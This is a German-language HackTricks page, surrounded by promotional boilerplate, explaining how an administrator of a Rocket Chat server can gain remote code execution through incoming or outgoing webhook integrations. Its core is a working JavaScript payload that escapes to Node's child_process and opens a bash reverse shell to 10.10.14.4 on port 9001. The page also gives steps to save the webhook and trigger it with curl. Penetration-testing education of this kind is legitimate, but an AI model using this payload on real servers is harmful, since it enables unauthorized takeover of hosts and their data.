# Rocket Chat
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! Andere Möglichkeiten, HackTricks zu unterstützen: * Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! * Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) * Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) * **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
## RCE Wenn Sie als Administrator in Rocket Chat angemeldet sind, können Sie RCE erhalten. * Gehen Sie zu **`Integrations`** und wählen Sie **`New Integration`** und wählen Sie eine beliebige: **`Incoming WebHook`** oder **`Outgoing WebHook`**. * `/admin/integrations/incoming`
* Laut der [Dokumentation](https://docs.rocket.chat/guides/administration/admin-panel/integrations) verwenden beide ES2015 / ECMAScript 6 ([im Grunde JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)), um die Daten zu verarbeiten. Also lassen Sie uns eine [rev shell für JavaScript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) wie: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") ``` * Konfigurieren Sie den WebHook (der Kanal und der Benutzername müssen vorhanden sein):
* Konfigurieren Sie das WebHook-Skript:
* Speichern Sie die Änderungen * Holen Sie sich die generierte WebHook-URL:
* Rufen Sie es mit curl auf und Sie sollten die Reverse-Shell erhalten
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! Andere Möglichkeiten, HackTricks zu unterstützen: * Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! * Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) * Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) * **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.